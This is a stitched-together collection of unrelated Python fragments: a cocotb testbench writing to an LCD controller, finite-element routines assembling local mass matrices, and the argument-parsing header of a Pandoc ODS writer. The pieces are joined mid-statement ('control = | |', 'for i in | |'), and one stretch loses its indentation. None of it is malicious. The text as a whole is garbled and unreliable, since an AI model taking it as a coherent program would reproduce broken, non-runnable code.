    Description:
        Write a 16-bit value to the controller

    Test ID: 0

    Expected Results:
        A value is successfully written to the
        the register of the controller.
        This value should be readable from the test bench
    """
    dut.rst <= 1
    dut.i_fsync <= 1
    dut.test_id <= 0
    axim = AXI4LiteMaster(dut, "AXIML", dut.clk)
    video_out = AXI4StreamMaster(dut, "AXIMS", dut.clk, width=24)
    setup_dut(dut)
    yield Timer(CLK_PERIOD * 10)
    dut.rst <= 0
    dut.log.info("Ready")
    yield Timer(CLK_PERIOD * 10)
    # NOTE(review): the reset/clock-start sequence is performed twice here —
    # presumably for settling; confirm whether the repetition is intentional.
    dut.rst <= 1
    setup_dut(dut)
    yield Timer(CLK_PERIOD * 10)
    dut.rst <= 0
    dut.log.info("Ready")
    yield Timer(CLK_PERIOD * 10)
    control = 0x00
    control |= 1 << BIT_CONTROL_CHIP_SELECT
    control |= 1 << BIT_CONTROL_RESET_DISPLAY
    control |= 1 << BIT_CONTROL_ENABLE
    control |= 1 << BIT_CONTROL_BACKLIGHT_ENABLE
    control |= 1 << BIT_CONTROL_WRITE_OVERRIDE
    #Reset the LCD
    yield axim.write(REG_CONTROL, control)
    yield Timer(CLK_PERIOD * 10)
    control &= ~(1 << BIT_CONTROL_RESET_DISPLAY)
    control &= ~(1 << BIT_CONTROL_WRITE_OVERRIDE)
    yield axim.write(REG_CONTROL, control)
    yield Timer(CLK_PERIOD * 10)
    control &= ~(1 << BIT_CONTROL_CHIP_SELECT)
    yield axim.write(REG_CONTROL, control)
    yield Timer(CLK_PERIOD * 10)
    control |= 1 << BIT_CONTROL_CHIP_SELECT
    ##################################################
    #Write a 0xAA55 to address 0xB8
    #First set up the correct mode
    control |= 1 << BIT_CONTROL_COMMAND_MODE
    control &= ~ (1 << BIT_CONTROL_COMMAND_PARAMETER)
    yield axim.write(REG_CONTROL, control)
    yield Timer(CLK_PERIOD * 10)
    #Set The Address to write to
    WRITE_ADDR = 0xB8
    yield axim.write(REG_COMMAND_DATA, WRITE_ADDR)
    yield Timer(CLK_PERIOD * 10)
    #Write the command
    control |= 1 << BIT_CONTROL_COMMAND_WRITE
    yield axim.write(REG_CONTROL, control)
    yield Timer(CLK_PERIOD * 10)
    #Write a parameter
    WRITE_PARAMETER_1 = 0xAA # Arbitrary Data
    WRITE_PARAMETER_2 = 0x55 # Arbitrary Data
    # Write Parameter 1
    yield axim.write(REG_COMMAND_DATA, WRITE_PARAMETER_1)
    yield Timer(CLK_PERIOD * 10)
    control |= 1 << BIT_CONTROL_COMMAND_PARAMETER
    yield axim.write(REG_CONTROL, control)
    yield Timer(CLK_PERIOD * 10)
    # Write Parameter 2
    yield axim.write(REG_COMMAND_DATA, WRITE_PARAMETER_2)
    yield Timer(CLK_PERIOD * 10)
    control |= 1 << BIT_CONTROL_COMMAND_PARAMETER
    yield axim.write(REG_CONTROL, control)
    yield Timer(CLK_PERIOD * 10)
    #yield FallingEdge(dut.w_write_n)
    #yield ReadOnly()
    data = dut.r_write_parameter
    value = (WRITE_PARAMETER_1 << 8) | WRITE_PARAMETER_2
    if data != value:
        # BUG FIX: the original format string had a single '%' placeholder
        # for two arguments (the first "0x02X" was missing its '%'), which
        # raised a TypeError instead of the intended failure message, and it
        # listed the actual value before the expected one.
        raise TestFailure(
            "Data written to register should have been: 0x%04X, but is 0x%04X"
            % (value, data))
    yield Timer(CLK_PERIOD * 100)
@cocotb.test(skip = True)
def read_from_controller(dut):
    """
    Description:
        Read a 16-bit value from the controller

    Test ID: 1

    Expected Results:
        Receive a read request to address 0xB8
        Should read back 0xAAAA
    """
    dut.rst <= 1
    dut.i_fsync <= 1
    dut.test_id <= 1
    axim = AXI4LiteMaster(dut, "AXIML", dut.clk)
    video_out = AXI4StreamMaster(dut, "AXIMS", dut.clk, width=24)
    setup_dut(dut)
    yield Timer(CLK_PERIOD * 10)
    dut.rst <= 0
    dut.log.info("Ready")
    yield Timer(CLK_PERIOD * 10)
    control = 0x00
    control |= 1 << BIT_CONTROL_CHIP_SELECT
    control |= 1 << BIT_CONTROL_RESET_DISPLAY
    control |= 1 << BIT_CONTROL_ENABLE
    control |= 1 << BIT_CONTROL_BACKLIGHT_ENABLE
    control |= 1 << BIT_CONTROL_WRITE_OVERRIDE
    #Reset the LCD
    yield axim.write(REG_CONTROL, control)
    yield Timer(CLK_PERIOD * 10)
    control &= ~(1 << BIT_CONTROL_RESET_DISPLAY)
    control &= ~(1 << BIT_CONTROL_WRITE_OVERRIDE)
    yield axim.write(REG_CONTROL, control)
    yield Timer(CLK_PERIOD * 10)
    control &= ~(1 << BIT_CONTROL_CHIP_SELECT)
    yield axim.write(REG_CONTROL, control)
    yield Timer(CLK_PERIOD * 10)
    control |= 1 << BIT_CONTROL_CHIP_SELECT
    control |= 1 << BIT_CONTROL_COMMAND_MODE
    # Set the address
    READ_ADDR = 0xB8
    control |= 1 << BIT_CONTROL_COMMAND_MODE  # NOTE(review): already set two lines above; redundant
    control &= ~ (1 << BIT_CONTROL_COMMAND_PARAMETER)
    yield axim.write(REG_CONTROL, control)
    yield Timer(CLK_PERIOD * 10)
    # Set address
    yield axim.write(REG_COMMAND_DATA, READ_ADDR)
    yield Timer(CLK_PERIOD * 10)
    control |= 1 << BIT_CONTROL_COMMAND_WRITE
    yield axim.write(REG_CONTROL, control)
    yield Timer(CLK_PERIOD * 10)
    # Switch to parameter-read mode and fetch the two data bytes (MSB first).
    control &= ~(1 << BIT_CONTROL_COMMAND_WRITE)
    control |= 1 << BIT_CONTROL_COMMAND_PARAMETER
    control |= 1 << BIT_CONTROL_COMMAND_READ
    yield axim.write(REG_CONTROL, control)
    yield Timer(CLK_PERIOD * 10)
    d1 = yield axim.read(REG_COMMAND_DATA)
    yield Timer(CLK_PERIOD * 10)
    yield axim.write(REG_CONTROL, control)
    yield Timer(CLK_PERIOD * 10)
    d2 = yield axim.read(REG_COMMAND_DATA)
    d2 = int(d2)
    d1 = int(d1 << 8)
    data = d1 + d2
    yield Timer(CLK_PERIOD * 10)
    if data != 0xAAAA:
        raise TestFailure("Data should have been 0x%04X but read: 0x%04X" % (0xAAAA, data))
    #Set the pixel count
    # NOTE(review): these image-geometry writes look like leftovers from the
    # frame tests below — confirm they are needed in a register-read test.
    yield axim.write(REG_IMAGE_WIDTH, WIDTH)
    yield Timer(CLK_PERIOD * 10)
    yield axim.write(REG_IMAGE_HEIGHT, HEIGHT)
    yield Timer(CLK_PERIOD * 10)
    yield axim.write(REG_IMAGE_SIZE, WIDTH * HEIGHT)
    yield Timer(CLK_PERIOD * 10)
@cocotb.test(skip = False)
def write_single_frame(dut):
    """
    Description:
        Send a single image to the controller
        The signal format should be
        Command: Set Memory Address
        SEND Red, Blue, Green bytes
        Repeat until full image is sent

        It's important that the timing of the
        sync strobes are good so that the FIFO doesn't
        overfill

    Test ID: 2

    Expected Results:
        Should read images out of the controller
        *** NEED SOMETHING TO VERIFY THE IMAGES ARE CORRECT!!!***
    """
    dut.rst <= 1
    dut.i_fsync <= 0;
    dut.test_id <= 2
    axim = AXI4LiteMaster(dut, "AXIML", dut.clk)
    video_out = AXI4StreamMaster(dut, "AXIMS", dut.clk, width=24)
    NUM_FRAMES = 1
    # NOTE(review): these locals shadow the module-level WIDTH/HEIGHT (8x4)
    # with a 4x4 frame — confirm that is intended.
    HEIGHT = 4
    WIDTH = 4
    # Build a test pattern: white (0xFFFFFF) left/right borders, the column
    # index elsewhere.
    video = []
    for y in range (HEIGHT):
        line = []
        for x in range (WIDTH):
            if x == 0:
                value = 0xFFFFFF
                line.append(value)
            elif x == (WIDTH) - 1:
                value = 0xFFFFFF
                line.append(value)
            else:
                value = x
                line.append(value)
        video.append(line)
    setup_dut(dut)
    yield Timer(CLK_PERIOD * 10)
    dut.rst <= 0
    dut.log.info("Ready")
    yield Timer(CLK_PERIOD * 10)
    control = 0x00
    control |= 1 << BIT_CONTROL_CHIP_SELECT
    control |= 1 << BIT_CONTROL_RESET_DISPLAY
    control |= 1 << BIT_CONTROL_ENABLE
    control |= 1 << BIT_CONTROL_BACKLIGHT_ENABLE
    control |= 1 << BIT_CONTROL_WRITE_OVERRIDE
    #Reset the LCD
    yield axim.write(REG_CONTROL, control)
    yield Timer(CLK_PERIOD * 10)
    control &= ~(1 << BIT_CONTROL_RESET_DISPLAY)
    control &= ~(1 << BIT_CONTROL_WRITE_OVERRIDE)
    dut.i_fsync <= 1
    yield axim.write(REG_CONTROL, control)
    yield Timer(CLK_PERIOD * 10)
    #Set the pixel count
    yield axim.write(REG_IMAGE_WIDTH, WIDTH)
    yield Timer(CLK_PERIOD * 10)
    yield axim.write(REG_IMAGE_HEIGHT, HEIGHT)
    yield Timer(CLK_PERIOD * 10)
    yield axim.write(REG_IMAGE_SIZE, WIDTH * HEIGHT)
    yield Timer(CLK_PERIOD * 10)
    # Pulse the frame-sync line before enabling the image write.
    dut.i_fsync <= 0
    yield Timer(CLK_PERIOD * 10)
    dut.i_fsync <= 1
    #Enable image write
    control = 0x00
    control |= 1 << BIT_CONTROL_ENABLE
    control |= 1 << BIT_CONTROL_BACKLIGHT_ENABLE
    yield axim.write(REG_CONTROL, control)
    yield Timer(CLK_PERIOD * 10)
    #Write Video to the video controller
    for line in video:
        yield video_out.write(line)
    yield Timer(CLK_PERIOD * 400)
@cocotb.test(skip = True)
def write_multiple_frames(dut):
"""
Description:
Send multiple images out of the controller
This test will verify that the full images
are successfully sent out and the process of restarting
the next image transfer does not lead to an error
Test ID: 3
Expected Results:
Should read images out of the controller
*** NEED SOMETHING TO VERIFY THE IMAGES ARE CORRECT!!!***
"""
dut.rst <= 1
dut.i_fsync <= 0;
dut.test_id <= 3
axim = AXI4LiteMaster(dut, "AXIML", dut.clk)
video_out = AXI4StreamMaster(dut, "AXIMS", dut.clk, width=24)
NUM_FRAMES = 4
HEIGHT = 4
WIDTH = 4
video = []
for y in range (HEIGHT):
line = []
for x in range (WIDTH):
if x == 0:
value = 0xFFFFFF
line.append(value)
elif x == (WIDTH) - 1:
value = 0xFFFFFF
line.append(value)
else:
value = x
line.append(value)
video.append(line)
setup_dut(dut)
yield Timer(CLK_PERIOD * 10)
dut.rst <= 0
dut.log.info("Ready")
yield Timer(CLK_PERIOD * 10)
control = 0x00
control |= 1 << BIT_CONTROL_CHIP_SELECT
control |= 1 << BIT_CONTROL_RESET_DISPLAY
control |= 1 << BIT_CONTROL_ENABLE
control |= 1 << BIT_CONTROL_BACKLIGHT_ENABLE
control |= 1 << BIT_CONTROL_WRITE_OVERRIDE
#Reset the LCD
yield axim.write(REG_CONTROL, control)
yield Timer(CLK_PERIOD * 10)
control &= ~(1 << BIT_CONTROL_RESET_DISPLAY)
control &= ~(1 << BIT_CONTROL_WRITE_OVERRIDE)
dut.i_fsync <= 1
yield axim.write(REG_CONTROL, control)
yield Timer(CLK_PERIOD * 10)
#Set the pixel count
yield axim.write(REG_IMAGE_WIDTH, WIDTH)
yield Timer(CLK_PERIOD * 10)
yield axim.write(REG_IMAGE_HEIGHT, HEIGHT)
yield Timer(CLK_PERIOD * 10)
yield axim.write(REG_IMAGE_SIZE, WIDTH * HEIGHT)
yield Timer(CLK_PERIOD * 10)
dut.i_fsync <= 0
yield Timer(CLK_PERIOD * 10)
dut.i_fsync <= 1
#Enable image write
control = | |
by pi/2 in the counterclockwise direction of the tangential vector
#will result in an outward normal vector.
#The last vertex,edge will be the first. This is in order to complete the loop.
N = len(Element)
OrientedEdges = [0]*(N+1)
OrientedVertices = [0]*(N+1)
for i in range(N):
if Ori[i]==1:
OrientedEdges[i] = EdgeNodes[Element[i]] #If they are "well-oriented" then do not alter them
else:
[v1,v2] = EdgeNodes[Element[i]] #Otherwise reverse the order of their vertices
OrientedEdges[i] = [v2,v1]
OrientedVertices[i] = Nodes[OrientedEdges[i][0]]
OrientedEdges[N] = OrientedEdges[0]
OrientedVertices[N] = OrientedVertices[0]
return OrientedVertices,OrientedEdges
def Centroid(Element,EdgeNodes,Nodes,Ori):
    #This function, when provided with an element, will return its centroid or barycenter.
    #Returns (Cx, Cy, A, Vertices, Edges): the centroid coordinates, the
    #signed polygon area (positive for counterclockwise orientation), and the
    #oriented vertex/edge lists produced by StandardElement (first entry
    #repeated at the end to close the loop).
    N = len(Element)
    Cx = 0
    Cy = 0
    A = 0
    Vertices,Edges = StandardElement(Element,EdgeNodes,Nodes,Ori)
    for i in range(N):
        xi = Vertices[i][0]
        yi = Vertices[i][1]
        xiplusone = Vertices[i+1][0]
        yiplusone = Vertices[i+1][1]
        Cx = Cx+(xi+xiplusone)*(xi*yiplusone-xiplusone*yi) #This formula is in Wikipedia
        Cy = Cy+(yi+yiplusone)*(xi*yiplusone-xiplusone*yi)
        A = A+xi*yiplusone-xiplusone*yi #shoelace accumulation
    A = 0.5*A
    Cx = Cx/(6*A)
    Cy = Cy/(6*A)
    return Cx,Cy,A,Vertices,Edges
def InternalObjects(Boundary,Objects):
    #Given a set of geometrical objects (vertices or edges) and the indices of
    #those on the boundary, return the sorted array of interior indices and
    #how many there are.
    interior = np.array(sorted(set(range(len(Objects))) - set(Boundary)))
    return interior, len(interior)
#Assembly
def LocprojE(Func,Element,EdgeNodes,Nodes):
    #Project the vector field Func onto the edge-based space: one degree of
    #freedom per edge, the normal flux evaluated with the midpoint rule.
    #The unit normal is the clockwise rotation (dy, -dx) of the tangent.
    proj = np.zeros((len(Element),1))
    for row, edge in enumerate(Element):
        x1, y1 = Nodes[EdgeNodes[edge][0]]
        x2, y2 = Nodes[EdgeNodes[edge][1]]
        edge_len = math.sqrt((x2-x1)**2+(y2-y1)**2)
        #midpoint rule for the flux integral
        Fx, Fy = Func(0.5*(x1+x2), 0.5*(y1+y2))
        proj[row] = ((y2-y1)*Fx + (x1-x2)*Fy)/edge_len
    return proj
def LocalMassMatrix(N,R,n,A,nu):
    #Assemble the local MFD mass matrix M = M0 + gamma*(I - N (N^T N)^-1 N^T)
    #following Ch.4 of the MFD book: M0 = R (N^T R)^-1 R^T is the consistency
    #term, the second term is the stabilization.
    #n is the dimension of the reconstruction space, A the element area and
    #nu the element-average diffusion coefficient; the stabilization scale is
    #gamma = trace(R R^T)/(n*A*nu).
    Nt = np.transpose(N)
    consistency = R.dot(np.linalg.inv(Nt.dot(R))).dot(np.transpose(R))
    stabilizer = np.identity(n) - N.dot(np.linalg.inv(Nt.dot(N))).dot(Nt)
    gamma = np.trace(R.dot(np.transpose(R)))/(n*A*nu)
    return consistency + stabilizer*gamma
#Scaled monomial basis {1, x-xP, y-yP} used to build the nodal-space mass
#matrix; (xP, yP) is the element centroid.
def m1(x, y, xP, yP):
    """Constant monomial."""
    return 1
def m2(x, y, xP, yP):
    """First-order monomial x - xP, centred at the element centroid."""
    return x - xP
def m3(x, y, xP, yP):
    """First-order monomial y - yP, centred at the element centroid."""
    return y - yP
def P0(ElNodes,func,xP,yP):
    #Vertex-average (P0) projection: evaluate func at every vertex of the
    #element and return the arithmetic mean.
    total = sum(func(px, py, xP, yP) for px, py in ElNodes)
    return total/len(ElNodes)
def NewLocalMEWEMVWV(J,Basis,Element,EdgeNodes,Nodes,Ori):
    #This routine will compute the local mass matrix in the edge-based space E
    #Here we must ensure that the orientation of the elements is such that
    #We have an orientation for the edges that respects stoke's theorem
    #Returns (ME, MV, MJ, Edges): the edge-space mass matrix, the nodal (VEM)
    #mass matrix, the coupling matrix built from J and the polynomial Basis,
    #and the oriented edge list of the element.
    n = len(Element)
    Dim = len(Basis)
    xP,yP,A,Vertices,Edges = Centroid(Element,EdgeNodes,Nodes,Ori)
    nu = DiffusionCoeff(xP,yP)
    #Edge-space N and R matrices (unit normals and scaled midpoint offsets).
    NE = np.zeros((n,2))
    RE = np.zeros((n,2))
    for i in range(n):
        x1 = Vertices[i][0]
        y1 = Vertices[i][1]
        x2 = Vertices[i+1][0]
        y2 = Vertices[i+1][1]
        lengthEdge = math.sqrt((x2-x1)**2+(y2-y1)**2)
        NE[i][0] = (y2-y1)*Ori[i]*lengthEdge**-1
        NE[i][1] = (x1-x2)*Ori[i]*lengthEdge**-1
        RE[i][0] = (0.5*(x1+x2)-xP)*Ori[i]*lengthEdge #These formulas are derived in the tex-document
        RE[i][1] = (0.5*(y1+y2)-yP)*Ori[i]*lengthEdge
    ME = LocalMassMatrix(NE,RE,n,A,1)
    #WE=LocalMassMatrix(RE,NE,n,A,1)
    #########################
    #Here we will construct the local nodal mass matrix
    OrVert,OrEdg = StandardElement(Element,EdgeNodes,Nodes,Ori)
    ElNodes = OrVert[0:n]
    ElEdges = OrEdg[0:n]
    #G, B, H and D are the standard VEM matrices for the monomial basis
    #{m1, m2, m3} (see the m1/m2/m3 helpers above).
    G = np.zeros((3,3))
    G[0,0] = 1
    G[0,1] = P0(ElNodes,m2,xP,yP)
    G[1,1] = A
    G[0,2] = P0(ElNodes,m3,xP,yP)
    G[2,2] = A
    B = np.ones((3,n))/n
    H = np.zeros((3,3))
    H[0,0] = A
    for i in range(n):
        x1 = Vertices[i][0]
        y1 = Vertices[i][1]
        x2 = Vertices[i+1][0]
        y2 = Vertices[i+1][1]
        lengthedge = math.sqrt((x2-x1)**2+(y2-y1)**2)
        taux = (x2-x1)/lengthedge
        tauy = (y2-y1)/lengthedge
        B[1,i] = 0.5*lengthedge*tauy
        B[2,i] = -0.5*lengthedge*taux
        #Boundary quadrature (Simpson's 3/8-style nodes at thirds of the edge)
        #for the monomial moment integrals accumulated into H.
        h = lengthedge/3
        nx = tauy
        ny = -taux
        costheta = (x2-x1)/lengthedge
        sintheta = (y2-y1)/lengthedge
        xot = x1+h*costheta
        yot = y1+h*sintheta
        xtt = x1+2*h*costheta
        ytt = y1+2*h*sintheta
        H[1,1] = H[1,1] + h*nx*( m2(x1,y1,xP,yP)**3+\
                                 3*m2(xot,yot,xP,yP)**3+\
                                 3*m2(xtt,ytt,xP,yP)**3+\
                                 m2(x2,y2,xP,yP)**3 )/8
        H[2,2] = H[2,2] + h*nx*( m3(x1,y1,xP,yP)**3+\
                                 3*m3(xot,yot,xP,yP)**3+\
                                 3*m3(xtt,ytt,xP,yP)**3+\
                                 m3(x2,y2,xP,yP)**3 )/8
        H[1,2] = H[1,2] + 3*h*nx*( m3(x1,y1,xP,yP)*m2(x1,y1,xP,yP)**2+\
                                 3*m3(xot,yot,xP,yP)*m2(xot,yot,xP,yP)**2+\
                                 3*m3(xtt,ytt,xP,yP)*m2(xtt,ytt,xP,yP)**2+\
                                 m3(x2,y2,xP,yP)*m2(x2,y2,xP,yP)**2 )/16
        H[2,1] = H[2,1] + 3*h*nx*( m3(x1,y1,xP,yP)*m2(x1,y1,xP,yP)**2+\
                                 3*m3(xot,yot,xP,yP)*m2(xot,yot,xP,yP)**2+\
                                 3*m3(xtt,ytt,xP,yP)*m2(xtt,ytt,xP,yP)**2+\
                                 m3(x2,y2,xP,yP)*m2(x2,y2,xP,yP)**2 )/16
    D = np.ones((n,3))
    D[:,1] = [m2(x,y,xP,yP) for [x,y] in ElNodes]
    D[:,2] = [m3(x,y,xP,yP) for [x,y] in ElNodes]
    #VEM projector Pi* = G^-1 B and the nodal mass matrix with stabilization.
    Pistar = np.linalg.inv(G).dot(B)
    Pi = D.dot(Pistar)
    Id = np.identity(n)
    MV = np.transpose(Pistar).dot(H.dot(Pistar))+A*np.transpose(Id-Pi).dot(Id-Pi)
    #Project each basis field onto the edge space; NJ columns are the edge
    #DOFs of the basis fields.
    NJ = np.zeros((Dim,n))
    for i in range(Dim):
        NJ[i,:] = np.transpose( LocprojE(Basis[i],Element,EdgeNodes,Nodes) )
    NJ = np.transpose(NJ)
    #print(NJ)
    b = np.transpose(NJ).dot(ME)
    #print(b)
    #print(ME)
    #print(NJ)
    #print(np.transpose(NJ).dot(ME).dot(NJ))
    #print(np.linalg.inv( np.transpose(NJ).dot(ME).dot(NJ) ) )
    #pinv: the normal matrix can be singular for degenerate bases.
    MJ = np.linalg.pinv( np.transpose(NJ).dot(ME).dot(NJ) )
    #print(MJ)
    MJ = MJ.dot(b)
    #print(MJ)
    #Evaluate every basis polynomial at each vertex and build the J-weighted
    #coupling matrix (JMatrix rows pair -Jy, Jx at each vertex).
    PolyCoordinates = np.zeros((2*(len(Vertices)-1),Dim))
    JMatrix = np.zeros( (len(Vertices)-1,2*(len(Vertices)-1)) )
    l = 0
    k = 0
    for Polynomial in Basis:
        for j in range(len(Vertices)-1):
            Vertex = Vertices[j]
            x = Vertex[0]
            y = Vertex[1]
            Px,Py = Polynomial(x,y)
            PolyCoordinates[2*j,l] = Px
            PolyCoordinates[2*j+1,l] = Py
            if k==0:
                Jx,Jy = J(x,y)
                JMatrix[j,2*j] = -Jy
                JMatrix[j,2*j+1] = Jx
            j = j+1 #NOTE(review): dead code — overwritten by the for loop
        k = 1
        l = l+1
    MJ = JMatrix.dot(PolyCoordinates).dot(MJ)
    MJ = MV.dot(MJ)
    return ME,MV,MJ,Edges
def LeastSquaresLocalMEWEMVWV(J,Basis,Element,EdgeNodes,Nodes,Ori):
    """Assemble the local edge mass matrix ME, the local vertex mass matrix MV
    and the coupling matrix MJ for one polygonal element.

    Unlike the sibling routine above (which inverts the 3x3 Gram matrix G),
    this variant builds the nodal projector Pistar by least squares:
    Pistar = (D^T D)^{-1} D^T, i.e. the Moore-Penrose pseudoinverse of D.

    Args:
        J: callable (x, y) -> (Jx, Jy), sampled at element vertices.
        Basis: list of vector polynomials, each (x, y) -> (Px, Py).
        Element, EdgeNodes, Nodes, Ori: mesh connectivity/orientation data
            consumed by Centroid, StandardElement and LocprojE.

    Returns:
        (ME, MV, MJ, Edges)

    NOTE(review): depends on module-level helpers defined elsewhere in this
    file (Centroid, DiffusionCoeff, LocalMassMatrix, StandardElement, m2, m3,
    LocprojE) and on `math`/`np` imports.
    """
    #This routine will compute the local mass matrix in the edge-based space E
    #Here we must ensure that the orientation of the elements is such that
    #We have an orientation for the edges that respects stoke's theorem
    n = len(Element)
    Dim = len(Basis)
    # Element centroid (xP, yP), area A, ordered vertex list and edge list.
    xP,yP,A,Vertices,Edges = Centroid(Element,EdgeNodes,Nodes,Ori)
    nu = DiffusionCoeff(xP,yP)  # NOTE(review): computed but never used below
    NE = np.zeros((n,2))  # per-edge oriented unit normals
    RE = np.zeros((n,2))  # per-edge (midpoint - centroid) offsets scaled by edge length
    for i in range(n):
        x1 = Vertices[i][0]
        y1 = Vertices[i][1]
        x2 = Vertices[i+1][0]
        y2 = Vertices[i+1][1]
        lengthEdge = math.sqrt((x2-x1)**2+(y2-y1)**2)
        NE[i][0] = (y2-y1)*Ori[i]*lengthEdge**-1
        NE[i][1] = (x1-x2)*Ori[i]*lengthEdge**-1
        RE[i][0] = (0.5*(x1+x2)-xP)*Ori[i]*lengthEdge #These formulas are derived in the tex-document
        RE[i][1] = (0.5*(y1+y2)-yP)*Ori[i]*lengthEdge
    ME = LocalMassMatrix(NE,RE,n,A,1)
    #WE=LocalMassMatrix(RE,NE,n,A,1)
    #########################
    #Here we will construct the local nodal mass matrix
    OrVert,OrEdg = StandardElement(Element,EdgeNodes,Nodes,Ori)
    ElNodes = OrVert[0:n]
    ElEdges = OrEdg[0:n]  # NOTE(review): unused in this routine
    # H accumulates boundary quadrature of products of the centered monomials
    # m2, m3; H[0,0] is the element area.
    H = np.zeros((3,3))
    H[0,0] = A
    for i in range(n):
        x1 = Vertices[i][0]
        y1 = Vertices[i][1]
        x2 = Vertices[i+1][0]
        y2 = Vertices[i+1][1]
        lengthedge = math.sqrt((x2-x1)**2+(y2-y1)**2)
        taux = (x2-x1)/lengthedge
        tauy = (y2-y1)/lengthedge
        h = lengthedge/3  # edge is sampled at 4 equispaced points (step h)
        nx = tauy
        ny = -taux  # NOTE(review): unused below; only the x-normal appears
        costheta = (x2-x1)/lengthedge  # same values as taux/tauy above
        sintheta = (y2-y1)/lengthedge
        xot = x1+h*costheta   # first interior sample point on the edge
        yot = y1+h*sintheta
        xtt = x1+2*h*costheta # second interior sample point on the edge
        ytt = y1+2*h*sintheta
        # 4-point edge rule with weights (1, 3, 3, 1) -- looks like a
        # Simpson-3/8-type quadrature; TODO confirm the /8 and /16 scalings
        # against the tex-document referenced above.
        H[1,1] = H[1,1] + h*nx*( m2(x1,y1,xP,yP)**3+\
                                3*m2(xot,yot,xP,yP)**3+\
                                3*m2(xtt,ytt,xP,yP)**3+\
                                m2(x2,y2,xP,yP)**3 )/8
        H[2,2] = H[2,2] + h*nx*( m3(x1,y1,xP,yP)**3+\
                                3*m3(xot,yot,xP,yP)**3+\
                                3*m3(xtt,ytt,xP,yP)**3+\
                                m3(x2,y2,xP,yP)**3 )/8
        H[1,2] = H[1,2] + 3*h*nx*( m3(x1,y1,xP,yP)*m2(x1,y1,xP,yP)**2+\
                                3*m3(xot,yot,xP,yP)*m2(xot,yot,xP,yP)**2+\
                                3*m3(xtt,ytt,xP,yP)*m2(xtt,ytt,xP,yP)**2+\
                                m3(x2,y2,xP,yP)*m2(x2,y2,xP,yP)**2 )/16
        H[2,1] = H[2,1] + 3*h*nx*( m3(x1,y1,xP,yP)*m2(x1,y1,xP,yP)**2+\
                                3*m3(xot,yot,xP,yP)*m2(xot,yot,xP,yP)**2+\
                                3*m3(xtt,ytt,xP,yP)*m2(xtt,ytt,xP,yP)**2+\
                                m3(x2,y2,xP,yP)*m2(x2,y2,xP,yP)**2 )/16
    # D is the (n x 3) matrix of the monomial basis {1, m2, m3} evaluated at
    # the element nodes.
    D = np.ones((n,3))
    D[:,1] = [m2(x,y,xP,yP) for [x,y] in ElNodes]
    D[:,2] = [m3(x,y,xP,yP) for [x,y] in ElNodes]
    # Least-squares projector onto the monomial space: pinv(D) = (D^T D)^-1 D^T.
    Pistar = np.linalg.inv(np.transpose(D).dot(D)).dot(np.transpose(D))
    Pi = D.dot(Pistar)
    Id = np.identity(n)
    # MV: consistency term Pistar^T H Pistar plus an area-scaled term in the
    # complement of the projection -- appears to be the usual virtual-element
    # consistency + stabilisation split (TODO confirm against the write-up).
    MV = np.transpose(Pistar).dot(H.dot(Pistar))+A*np.transpose(Id-Pi).dot(Id-Pi)
    # NJ: edge-space projections of each basis polynomial, one column each.
    NJ = np.zeros((Dim,n))
    for i in range(Dim):
        NJ[i,:] = np.transpose( LocprojE(Basis[i],Element,EdgeNodes,Nodes) )
    NJ = np.transpose(NJ)
    #print(NJ)
    b = np.transpose(NJ).dot(ME)
    #print(b)
    #print(ME)
    #print(NJ)
    #print(np.transpose(NJ).dot(ME).dot(NJ))
    #print(np.linalg.inv( np.transpose(NJ).dot(ME).dot(NJ) ) )
    # pinv instead of inv: NJ^T ME NJ can be singular for some elements.
    MJ = np.linalg.pinv( np.transpose(NJ).dot(ME).dot(NJ) )
    #print(MJ)
    MJ = MJ.dot(b)
    #print(MJ)
    # Evaluate every basis polynomial (and, once, J) at the element vertices.
    PolyCoordinates = np.zeros((2*(len(Vertices)-1),Dim))
    JMatrix = np.zeros( (len(Vertices)-1,2*(len(Vertices)-1)) )
    l = 0
    k = 0
    for Polynomial in Basis:
        for j in range(len(Vertices)-1):
            Vertex = Vertices[j]
            x = Vertex[0]
            y = Vertex[1]
            Px,Py = Polynomial(x,y)
            PolyCoordinates[2*j,l] = Px
            PolyCoordinates[2*j+1,l] = Py
            if k==0:
                # JMatrix encodes the rotated J field (-Jy, Jx); built only on
                # the first pass over the vertices.
                Jx,Jy = J(x,y)
                JMatrix[j,2*j] = -Jy
                JMatrix[j,2*j+1] = Jx
            j = j+1  # NOTE(review): no-op -- j is rebound by the for loop
        k = 1
        l = l+1
    MJ = JMatrix.dot(PolyCoordinates).dot(MJ)
    MJ = MV.dot(MJ)
    return ME,MV,MJ,Edges
def psi3(x,y):
    """Barycentric hat function for the reference triangle that equals 1 at
    the origin and vanishes on the edge x + y = 1."""
    return (1 - x) - y
def psi2(x,y):
    """Barycentric hat function that is simply the second reference
    coordinate: 1 at (0, 1), 0 along the x-axis."""
    value = y
    return value
def psi1(x,y):
    """Barycentric hat function that is simply the first reference
    coordinate: 1 at (1, 0), 0 along the y-axis."""
    value = x
    return value
def PieceWiseLocalMEWEMVWV(J,Basis,Element,EdgeNodes,Nodes,Ori):
#This routine will compute the local mass matrix in the edge-based space E
#Here we must ensure that the orientation of the elements is such that
#We have an orientation for the edges that respects stoke's theorem
n = len(Element)
Dim = len(Basis)
xP,yP,A,Vertices,Edges = Centroid(Element,EdgeNodes,Nodes,Ori)
nu = DiffusionCoeff(xP,yP)
NE = np.zeros((n,2))
RE = np.zeros((n,2))
for i in | |
#!/usr/bin/env python3
import argparse
import json
import sys
from subprocess import Popen, PIPE
from odf.draw import Image, Frame
from odf.opendocument import OpenDocumentSpreadsheet
from odf.style import Style, TableColumnProperties, TableRowProperties, TextProperties
from odf.table import Table, TableRow, TableCell, TableColumn
from odf.text import P, A
from pandocodswriter.limages import load_images
from pandocodswriter.lstyle import load_style, add_fmt, st_dict
# usage - python odswriter.py yourInputFile.yourExtension yourOutputFile.ods -s *YOUR POSITIVE NUMBER*
# check README.md for more information.
# DO NOT mix up places of input and output.
# Style names.
# header0 - just for correct index.
# If in input file more, than two levels of headers, next level header will generate automatically
# with name = "header" + str(level).
header = ['header0', 'header1', 'header2']
table_header = 'tablehead'
table_content = 'tablebody'
simple_text = 'text'
# Read the command-line arguments.
# NOTE: parse_args() runs at import time, so importing this module without
# CLI arguments will exit with an argparse usage error.
parser = argparse.ArgumentParser(description='Pandoc ODS writer. This is Pandoc filter, but there is no opportunity '
                                             'write .ods files easier way. So, use "out.ods" '
                                             'option to write .ods files with this filter')
parser.add_argument('input', help='Input file. Use Pandoc`s input formats.', action='store')
parser.add_argument('output', help='Output file. Use .ods filename extension.', action='store')
parser.add_argument('-s', '--separator', nargs=1, help='Header level to separate sheets, 0 by default(no separation).',
                    action='store')
